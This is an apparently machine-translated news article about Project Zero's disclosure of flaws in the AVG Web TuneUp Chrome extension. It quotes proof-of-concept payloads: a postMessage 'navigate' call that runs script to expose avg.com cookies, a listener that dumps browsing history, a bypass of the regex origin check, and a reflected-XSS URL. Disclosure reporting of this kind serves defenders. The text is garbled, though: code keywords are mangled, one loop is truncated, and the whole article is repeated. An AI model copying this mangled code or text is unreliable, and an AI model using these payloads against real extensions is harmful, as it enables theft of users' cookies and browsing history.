Google browser plugin AVG Web TuneUp multiple high-risk vulnerabilities affect 9 million users
In August 15 this year, Tavis, a member of project zero, submitted multiple vulnerabilities in Google's browser plug-in AVG Web TuneUp. The plug-in has a wide range of impact because it has approximately 9 million active users.
This plug-in adds a lot of APIs to operate Google browsers, such as easily hijacking the search box and new tabs. Because of its complicated installation process, Google can evade the inspection of malware, especially Google's browser's "preventing abuse of extended APIs.
In fact, many of these APIs are problematic. Attackers can construct payload to steal users' cookies on avg.com and obtain users' browsing records and other private data, it is even possible to successfully execute arbitrary commands.
Attack methods
Tavis listed several attack methods in the email to the vendor: "navigate" API will cause a common cross-origin xss vulnerability, attacker.com can read the mail.google.com emails of visitors or data from other websites across domains.
For (I = 0; I
The above code is the poc provided by Tavis.
Use window. postMessage (javascript api that allows cross-origin communication) to continuously send requests to the AVG: "Web TuneUP" plug-in. The requested data is:
{Origin: "web", action: "navigate", data: {url: "javascript: document. location. hostname. endsWith ('.avg.com')" + "? "+" Alert (document. domain + ':' + document. cookie) "+": "+" false ", tabID: I }}
When a user's tab accesses an avg.com website, the current domain name and cookie value of the website ending with .avg.com will be cracked. The "recently" api exposes the browsing history of the current user.
Window. addEventListener ("message", receiveMessage, false );
Window. postMessage ({from: "web", to: "content", method: "recently "},"*")
Function receiveMessage (event)
{
If (event. data! = Undefined & event. data. historyItems! = Undefined ){
Var obj = JSON. parse (event. data. historyItems );
Document. write ("Here is a list of websites you 've been visiting ");
Document. write ("
");
For (I in obj ){
Var d = new Date (obj [I]);
Document. write ("" + I + "on" + d );
Document. write ("
");
}
}
}
The above code is the poc provided by Tavis.
Use window. postMessage to send a request to the plug-in's "recently" API to obtain the browsing history of the current user, locally listen to events to obtain the returned data, and then output the data.
The vendor then fixed the issue. However, due to the incorrect fix, it was bypassed by Tavis. Added judgment in the repaired code
Var match = event. origin. match (/https? : \/. * \. Avg \. com/I );
If (match! Null {
...
}
Determine whether the source contains ".avg.com", but this is easy to bypass. For example, the https://www.avg.com.www.attacker.com domain name can bypass this limitation, continue to implement the above two attacks. The above judgment on the protocol is that both http and https are supported, and thus the man-in-the-middle attack problem occurs.
The vendor has fixed the issue. This time, the domain names must be "mysearch.avg.com" and "webtuneup.avg.com ". However, the following xss can steal user data:
Http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html? Risk = % 3 Cimg % 20src = x % 20 onerror = alert (1) % 3E & searchParams = % 7B % 22 lang % 22% 3A % 22en % 22% 2C % 22pid % 22% 3A % 22pid % 22% 2C % 22 v % 22% 3A % 22vv % 22% 7D
This problem is fixed in AVG Web TuneUp of version 4.2.5.169. You can upgrade it in the store.
In August 15 this year, Tavis, a member of project zero, submitted multiple vulnerabilities in Google's browser plug-in AVG Web TuneUp. The plug-in has a wide range of impact because it has approximately 9 million active users.
This plug-in adds a lot of APIs to operate Google browsers, such as easily hijacking the search box and new tabs. Because of its complicated installation process, Google can evade the inspection of malware, especially Google's browser's "preventing abuse of extended APIs.
In fact, many of these APIs are problematic. Attackers can construct payload to steal users' cookies on avg.com and obtain users' browsing records and other private data, it is even possible to successfully execute arbitrary commands.
Attack methods
Tavis listed several attack methods in the email to the vendor: "navigate" API will cause a common cross-origin xss vulnerability, attacker.com can read the mail.google.com emails of visitors or data from other websites across domains.
For (I = 0; I
The above code is the poc provided by Tavis.
Use window. postMessage (javascript api that allows cross-origin communication) to continuously send requests to the AVG: "Web TuneUP" plug-in. The requested data is:
{Origin: "web", action: "navigate", data: {url: "javascript: document. location. hostname. endsWith ('.avg.com')" + "? "+" Alert (document. domain + ':' + document. cookie) "+": "+" false ", tabID: I }}
When a user's tab accesses an avg.com website, the current domain name and cookie value of the website ending with .avg.com will be cracked. The "recently" api exposes the browsing history of the current user.
Window. addEventListener ("message", receiveMessage, false );
Window. postMessage ({from: "web", to: "content", method: "recently "},"*")
Function receiveMessage (event)
{
If (event. data! = Undefined & event. data. historyItems! = Undefined ){
Var obj = JSON. parse (event. data. historyItems );
Document. write ("Here is a list of websites you 've been visiting ");
Document. write ("
");
For (I in obj ){
Var d = new Date (obj [I]);
Document. write ("" + I + "on" + d );
Document. write ("
");
}
}
}
The above code is the poc provided by Tavis.
Use window. postMessage to send a request to the plug-in's "recently" API to obtain the browsing history of the current user, locally listen to events to obtain the returned data, and then output the data.
The vendor then fixed the issue. However, due to the incorrect fix, it was bypassed by Tavis. Added judgment in the repaired code
Var match = event. origin. match (/https? : \/. * \. Avg \. com/I );
If (match! Null {
...
}
Determine whether the source contains ".avg.com", but this is easy to bypass. For example, the https://www.avg.com.www.attacker.com domain name can bypass this limitation, continue to implement the above two attacks. The above judgment on the protocol is that both http and https are supported, and thus the man-in-the-middle attack problem occurs.
The vendor has fixed the issue. This time, the domain names must be "mysearch.avg.com" and "webtuneup.avg.com ". However, the following xss can steal user data:
Http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html? Risk = % 3 Cimg % 20src = x % 20 onerror = alert (1) % 3E & searchParams = % 7B % 22 lang % 22% 3A % 22en % 22% 2C % 22pid % 22% 3A % 22pid % 22% 2C % 22 v % 22% 3A % 22vv % 22% 7D
This problem is fixed in AVG Web TuneUp of version 4.2.5.169. You can upgrade it in the store.